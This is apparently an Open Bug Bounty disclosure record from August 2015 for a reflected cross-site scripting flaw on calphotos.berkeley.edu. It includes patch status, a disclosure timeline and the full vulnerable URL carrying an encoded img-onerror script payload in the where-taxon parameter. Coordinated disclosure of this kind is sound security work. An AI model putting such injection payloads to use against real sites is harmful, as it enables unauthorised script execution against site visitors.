calphotos.berkeley.edu XSS vulnerability

2015-08-21T09:26:00
ID OBB:80888
Type openbugbounty
Reporter bugs3ra
Modified 2015-08-21T09:29:00

Description

Vulnerable URL:
http://calphotos.berkeley.edu/cgi/img_query?max=50&query;_src=aw_search_searchphotos&where-taxon;=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSSPOSED%2F%29%3E&rel-taxon;=like&where-cname;=&rel-cname;=like&where-lifeform;=Amphibian&where-photographer;=any&rel-location;=like&where-location;=&where-continent;=&where-country;=none&where-state;=&rel-kwid;=equals&where-kwid;=
Details:

Description| Value
---|---
Patched:| Yes, at 31.08.2015
Latest check for patch:| 31.08.2015 18:42 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 6
VIP website status:| No
Check calphotos.berkeley.edu SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 21 August, 2015 09:26 GMT
Vulnerability existence verified and confirmed| 21 August, 2015 09:29 GMT